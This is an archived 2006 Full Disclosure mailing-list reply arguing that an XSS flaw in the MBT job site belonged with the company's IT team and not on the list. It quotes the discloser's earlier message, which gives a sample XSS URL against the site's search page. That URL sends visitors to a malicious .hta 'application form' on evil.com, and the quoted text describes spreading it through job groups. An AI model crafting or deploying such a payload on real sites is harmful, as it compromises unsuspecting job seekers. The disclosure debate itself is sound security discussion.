Full Disclosure mailing list archives
Re: MBT Xss vulnerability
From: "Native.Code" <native.code () gmail com>
Date: Sun, 22 Jan 2006 23:56:32 +0800
Nice discussion guys. Perhaps I should have mentioned that XSS about every site should not be posted to FD. And MBT does *not* attract millions of job-seekers. It is an Indian employer and IT job-seekers in India, at any given time, should not be more than one million. I believe most of subscribers on this list did not have to know this XSS. It should have been better reported to IT team at MBT. Best. On 1/21/06, MuNNa <sant.jadhav () gmail com> wrote:
Hii Bro, I got the point.You meant to say that Xss for each and every site should not be posted here, unless n until it attracts heavy traffic like Yahoo etc. I agree to this that MBT doesnt attract that amount of traffic normally but you can target millions of users at one go. Like say...there are many groups that post new job vacancies everyday. So if i create a url with javascript allowing you to download a file with say .hta extension and it claims itself to be some form that has to be filled by victim in order to apply for job. For eg. http://www.mahindrabt.com/jse/jsp/search.jsp?q=<script> document.location='www.evil.com/applicationform.hta'</script> If you post this URL in any of the above groups, you can be sure that your file will be downloaded by thousands of users. This is because MBT is one of the top employers. Believe me. Before some one downloads such files and gets his machine compromised, i just wanted to warn the users. As number of victims could be large enough to create havoc, MBT's Xss vuln was of great concern to me.This is what made me post this vuln over here. May be i might have posted it in the wrong list. If this is the case, i am sory to cause annoyance to you and others. Regards; Santosh J. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MBT Xss vulnerability MuNNa (Jan 19)
- Re: MBT Xss vulnerability Native.Code (Jan 19)
- Re: MBT Xss vulnerability greybrimstone (Jan 19)
- Re: MBT Xss vulnerability MuNNa (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability MuNNa (Jan 20)
- Re: MBT Xss vulnerability Morning Wood (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability MuNNa (Jan 21)
- Re: MBT Xss vulnerability Native.Code (Jan 22)
- Re: MBT Xss vulnerability greybrimstone (Jan 19)
- Re: MBT Xss vulnerability Native.Code (Jan 19)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
- Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)